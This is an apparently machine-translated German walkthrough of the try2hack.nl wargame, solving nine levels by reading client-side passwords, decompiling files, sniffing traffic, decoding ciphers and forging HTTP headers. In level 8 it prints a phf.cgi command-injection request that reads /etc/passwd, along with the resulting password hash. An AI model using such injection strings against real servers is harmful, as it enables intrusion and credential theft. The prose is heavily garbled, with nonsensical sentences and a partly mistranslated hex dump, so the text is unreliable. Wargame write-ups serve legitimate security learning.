Netzwerk-Reduzierung


Ein paar Tage zurück (13.06.02), warf einige Muffins mich auf ICQ URL http://www.try2hack.nl/level1.html , angeblich um ihre Stärke zu testen. Ich gebe zu, dass jeder Job auf dieser Seite auf seine eigene Weise war kompliziert, aber zu der Zeit, bla, bla, interessant. Wer nicht diesen Test nicht bestanden, empfehle ich zu stark versuchen. Nun, aber diejenigen, die versucht haben, das Wohlbefinden wird auch bis zum 10. Job nicht erreicht wird, lesen Sie diesen Artikel =)
Nun, lassen Sie uns beginnen. Auf einmal will ich sagen, dass ich Lösungen zu den wichtigsten aktuellen 9 mi Zuweisungen beschreiben, wird Details nur komplex auch interessant ist.

# 1.

Elementare. Hier LAS auf Kennwortüberprüfung js:
  <Script language = "JavaScript">
 Funktion Try (passwd) {
 if (passwd == "hackerzzz") {
 alert ( "Alles klar auf der Ebene 2 ...!");
 location.href = "levvel2.html";
 }
 else {
 alert ( "Das Passwort ist falsch Bitte Mitteilung nicht mehr Versuchen ..");
 location.href = "http://www.disney.com";
 };
 }
 </ SCRIPT> 
In der dritten Zeile des eingegebenen Wert wird mit dem Wort "hackerzzz" geprüft, die in diesem Fall als Kennwort dient.

# 2.

Ich gebe zu der Hauptansicht, schien die Aufgabe schwierig. Ich war falsch =)
Schenken Sie sich ein Flash-Laufwerk, zeigen wir ihren Notizblock (Sie können Hex-Editor) und dem Boden (Adresse 00.000.440-00.000.490) finden Sie unter:
txtUsername ...... Try2Hack.I .... TxtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Anmeldung Try2Hack
Kennwort NokiaIsGood
Weiter. Job LLeVeLL3.html

# 3.

Sehr klug und interessante Aufgabe.
Diese Quelle js'a:
  <SCRIPT language = "JavaScript">
 PWD = prompt ( "Bitte geben Sie das Passwort für Level 3", "");
 if (PWD == PASSWORT) {
 alert ( "In Ordnung \ nEntering Stufe 4 ...!");
 location.href = CORRECTSITE;
 } else
 {
 alert ( "FALSCH \ Nback nach Disneyland !!!!");
 location.href = WRONGSITE;
 }
 PASSWORT = "ABCDE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </ SCRIPT> 
Es scheint, dass das Passwort "ABCDE", aber bla bla es funktionieren kann, wenn es am Ende bestimmt wird? Allerdings hat die Variable PASSWORT zum Zeitpunkt der Prüfung aus irgendeinem Grund bereits definiert wurde, sonst wäre Dolmetscher in Fehler "Passwort: Definition fehlt." Darüber hinaus nur über 20 Minuten. Reflexion im Auge warf eine Linie:
<Script src = "JavaScript"> </ SCRIPT>
Auf jeden Fall hätte ich nicht gedacht, dass "JavaScript" ist eine Datei =))) In ihm für einen Tag und waren die wahren Werte der Variablen:
PASSWORT = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

# 4.

Picking-Applet Pflegelinie bei 00000A60-00000A80 gezogen. Das Applet liest Zeilen aus einer Datei * level4 * (in letzterem dizasmenny LAS dies bestätigt). Wahrscheinlich war es die Passwort-Datei. Interessanterweise, dass sie es mit meinem Propeller für den Betrieb fortgesetzt. Was zu essen, entweder Datei * level4 * im Internet war oder auf meinem Computer. Und wenn in meinem, in welchem ​​Ort? Richtig, oder ein Cookie oder Temp'ah. Bürsten Sie auch die anderen, gingen wir auf einer Seite mit einem Applet. Die Rate kam ein paar Datei, von denen level4 [2] .txt.
Inhalt:
5_level_5.html
Try2Hack
AppletsAreEasy
By the way, im Inneren des Applet zu entfernen das Auge war: "txtUsername = AlmostAHacker ..... TxtPassword = ZqrE01A2d" Hitrooo =)
/ * Gr33tz 2 Patensohn * /

# 5.

Es wird vorgeschlagen, eine Datei level5.exe zum Download bereit. Darin müssen Sie Ihren Benutzernamen und das Passwort einzugeben, die in der Datei selbst scheinbar gespeichert sind. Öffnungs es hex'om im Auge gefangen:
http: //www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... TxtPassword = ZqrE01A2d
Adresa: 000019F0-00001A50.
Zu einfach, dachte ich. Zusätzlich richtig, Passwörter nicht gekommen. Weitere Hilfe kam Disassembler =):
Anmeldung Try2Hack
Kennwort OutOfInspiration
Weiter. Referenzpegel-6.html
/ * Gr33tz 2 a3oX =) * /

# 6.

Sehr verwirrend Aufgabe. bla bla wieder eingeladen, ein Programm herunterzuladen, die auf Ihre Augen mit dem Server verbunden ist, und überprüfen Sie Ihre eingegebenen Daten auf ihre Gültigkeit. An diesem Tag gewarnt Machern recht: "Dies ist nicht Level 5 ist, Sie nicht diese exe dekompilieren kann".
Für Hilfe kommen Sniffer SpyNet. Ich will nicht beschreiben, wie wir Che (separater Artikel erforderlich) haben, legen Sie, sobald wir in dem Paket interessiert sind:
  0000: 45 53 54 44 00 00 20 53 52 43 00 00 08 00 45 00 DEST .. SRC .... E.
 0010: 02 40 5F 78 40 00 71 14. Juni E0 D5 13 8C 02 57 C2 @ _ x @ ratgeber ........ W.
 0020: 6F F2 00 50 04 04 AE EC FD 8C 1A 9A B0 11 50 10 o..P .......... P.
 0030: 40 7C AE D3 00 48 54 00 54 50 31 2E 2F 31 20 32 @ | .... HTTP / 1.1 2
 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E 00 OK..Date: Sun
 0050: 2C 20 31 34 20 41 70 72 20 32 30 30 32 20 31 38 14 18. April 2002
 0060: 3A 3A 32 32 35 35 20 47 4D 54 0D 0A 53 65 72 76 22 55 GMT..Serv
 0070: 65 3A 20 41 70 72 61 63 68 65 0D 0A 43 61 63 68 er: Apache..Cach
 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 6D 20 61 78 2D 61 E-Control: max-a
 0090: 67 65 3D 30 34 38 36 30 30 0D 0A 45 78 70 69 72 ge = 604800..Expir
 00A0: 73 65 3A 20 53 75 6E 20 32 2C 31 20 41 70 72 20 es: So, 21. April 
 00B0: 32 30 30 32 20 31 38 32 32 3A 3A 35 35 20 47 4D 2002 18.22.55 GM
 00C0: 54 0D 0A 61 4C 73 74 2D-4D 6F 64 69 66 69 65 64 T..Last-Modified
 00D0: 3A 20 57 65 64 2C 31 38 20 20 41 70 72 20 32 30: Mi 18 Apr 20
 00E0: 31 20 31 30 35 32 38 3A 3A 30 30 20 47 4D 54 0D 01 15.28.00 GMT.
 00F0: 0A 45 3A 61 67 20 54 22 30 63 63 2D-2D 33 61 64 .ETag: "0-cc-3AD
 0100: 64 62 32 38 30 22 0D 0A 63 63 65 41 70 74 52 2D-db280 ".. Accept-R
 0110: 61 6E 67 65 73 3A 79 20 62 74 65 73 0D 0A 43 6F anges: bytes..Co
 0120: 6E 6E 74 65 74 4C 2D-6E 67 74 65 68 20 32 30 3A ntent-Länge: 20
 0130: 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 20 74 3A 4..Keep-Alive-: t
 0140: 69 6F 75 6D 65 3D 74 31 35 2C 20 61 6D 78 31 3D imeout = 15, max = 1
 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 20 6F 6E 3A 00..Connection: 
 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74 Keep-Alive..Cont
 0170: 6E 65 74 2D 54 79 70 65 3A 20 74 65 78 74 70 2F ent-Type: text / p
 0180: 61 69 6C 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50 gelegen ..... (Encryp
 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 43 2A 2A TION TYPE) .. B * C *
 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 41 4E 4D N ** N .... (usernam
 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 62 20 E) .. ababa abbab 
 01C0: 61 61 61 62 61 20 61 61 61 62 62 0D 0A 0D 0A 28 baaaa aaabb .... (
 01D0: 41 53 53 50 57 52 44 4F 29 0D 0A 61 62 61 62 61 PASSWORT) .. ababa
 01E0: 61 61 61 20 61 61 20 61 62 62 61 61 20 61 62 62 aaaaa abbaa abb
 01F0: 61 20 61 62 61 61 61 61 20 62 61 61 61 61 20 62 ba aaaaa baaaa b
 0200: 61 61 62 61 20 62 61 62 62 61 0D 0A 0D 0A 28 50 aaba babba .... (P
 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61 AGE) .. ababa aaba
 0220: 20 62 61 61 61 62 62 20 61 61 62 61 61 20 61 62 eine baabb aabaa ab
 0230: 62 61 20 61 62 61 61 61 62 20 61 61 62 61 61 20 aba BAAAB aabaa 
 0240: 61 61 62 62 62 20 61 61 62 61 61 20 61 62 baabb aabaa ab
Etwas getrimmt (Sie versuchen, aus dem Nama SpyNet'a zu kopieren), aber der Hauptanteil (Passwort Login-Seite) ist gut sichtbar. Es scheint, dass die Beschäftigung gemacht, aber nein. Alle Daten verschlüsselt worden: - /
(Username) .. ababa abbab Baaaa aaabb ....
(Passwort) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
Ich nahm JohnTheRipper'a auch Witz begann Sortierung ... =)) Dieser Algorithmus wurde Bacon. Voll elementarny Algorithmus, auch keine Verschlüsselung, sondern Verschlüsselung:
aaaaa = a
AAAAB = b
aaaba = c
aaabb = d
usw.
Manuelle Decodierungsergebnis war:
Anmeldung LORD
Vorbei LANPARTY
Seite LEVELSEVEN.html
Lernen Informatik, Kinder =)
/ * Gr33tz 2 D4rkGr3y;) * /

# 7.

Dan launisch gem Skript level7.pl. Aufgabe: zu ihm, machen sie zu glauben:
1) Seite, die wir auf der Website bekam: http://www.microsoft.com/ms.htm
2) Wir verwenden Microsoft Internet Explorer 6.72 Browser
3) Betriebs UNIX / Linux-System
Im Allgemeinen ist die Aufgabe einfach, wir brauchen nur einen HTTP-Anforderung zu generieren, den Titel, um diese Informationen enthalten werden. Also:
Referer: http://www.microsoft.com/ms.htm
User-agent: MSIE 6.72
Jedoch mit der Achse eines kleines Problem. Im Titelfeld, das eindeutig eine Art Betriebssystem angibt, nein. Es wird in der Regel von einem User-Agent gezogen. Cleave dass level7.pl auf diese Weise wirkt, haben wir ein Juwel skriptik skizziert, die eine solche Anfrage hier gesendet:
GET /cgi-bin/level7.pl HTTP / 1.0
Referer: http://www.microsoft.com/ms.htm
User-Agent: MSIE 6,72 (UNIX / Linux)
Annehmen: * / *

Und OPAA =)
<A HREF="../Level-8.html"> Stufe 8 </A>

# 8.

Sofort zog den Namen der Skriptverarbeitung phf.cgi. Ich erinnere mich an viele Einbrüche auf dem Gewissen war. Poryskav für Bug-Truckee gefunden sployt:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
Die Antwort lautete:
BuiZe: Bu3kOx4cCMX2U
Kennwort verschlüsselt DES'om üblich. JTR'u dauerte 15 min., Um pas zu lernen. Welche, zu verbreiten, vielleicht werde ich nicht, wer sollte - entziffern =)

# 9.

Auf der Seite mit dem Job prangt die Inschrift:
Neue Nachricht für BuiZe:

8 Level beendet!
Zum irc. <*>. Org und kommen # <*>
Es ist / msg <*> beginnen

Mit anderen Worten, wird das Feld auf der IGC übertragen. Servername, Kanal und bot wir verbergen die klaren (hoffentlich alle) Gründe.

# 9.

Es besteht aus einer Vielzahl von Mini-Zuordnungen.
Wir gehen zu ihnen auf dem Kanal # Try2Hack.
Wir schreiben "/ msg Try2Hack perfect-Start"
Nun auch, dass bla bla, er wird uns geben? und dies:
-TRY2HACK- Willkommen 9 Ebene zu try2hack! Decode die folgenden Zeilen, um fortzufahren!
-TRY2HACK- Wbva # gel2unpx.yriry9. Gb trg gur xrl Lbh arrq gb qrpbqr gur sbyybjvat Yvar:
-TRY2HACK- GTI2MJj5YJ15DxVmERy1rQIZ =
-TRY2HACK- TBBQ yhpx, NAQ frr Lbh ba # gel2unpx.yriry9.
razshifruyte selbst ... schwach? Nun, während wir Spaß haben will ich nicht klettern:
http://www.degraeve.com/cgi-bin/rot13.cgi
Auch hier wir razshifrovali gut, dass bla bla wir haben:
Registriert # try2hack.level9. Um den Schlüssel müssen Sie die folgende Zeile zu entschlüsseln:
TGV2ZWw5LW15QkIzREl1eDVM =
Viel Glück, und sehen Sie auf # try2hack.level9.
wir haben eine Panik, wie wir wissen, über begonnen. was für ?
TGV2ZWw5LW15QkIzREl1eDVM =
hmm aus der Hauptansicht schien es UTB ist kompliziert, aber wir es in Erinnerung Mirkowska scripts / echo $ decode schrieb (TGV2ZWw5LW15QkIzREl1eDVM =, m), wie wir poluchyaem Level9-myBB3DIux5L UTB werden wir Okay, an den Kanal gehen und klopft uns Ankündigung
-LEVEL9-XXX- Willkommen, ich bin try2hack Level9! Decode die folgende Zeile, um fortzufahren:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
natured alte binäre ... wenn ungern manuell Well razshifrovat Well
http://www.nickciske.com/binary/index.php
wir bekommen ein "Nice Job. Nun geben Sie" / msg TRY2HACK showbug ', um den Fehler zu sehen "
Nun Geschreibsel / msg TRY2HACK showbug, wie es uns zeigt die Fehler selbst
-TRY2HACK- Ovaq pgpe - CVAT pgpe: cvatercyl
-TRY2HACK- CEBP pgpe: cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- Brd qhe [rkce [havkgvzr] - $ net]
-TRY2HACK- Chgfrei "ABGVPR $ avpx: Lbhe CVAT ercyl gbbx $ qhe frpbaqf"}
Ooh wieder zashivrovan er gut, wieder wir den Link oben razshivrovschikom verwenden, die vergessen haben,%) ... razshifrovali .... Aber auch ein Problem ... wir versichern den Raum, als ob jemand nach unten skinte saß Seife [email protected] machen .
Zur Lösung Aufgaben neunten danken NeoN'a =)

Autor: D4rkGr3y


Das Material wird mit Genehmigung der DHGROUP veröffentlicht (http://www.dhgroup.org)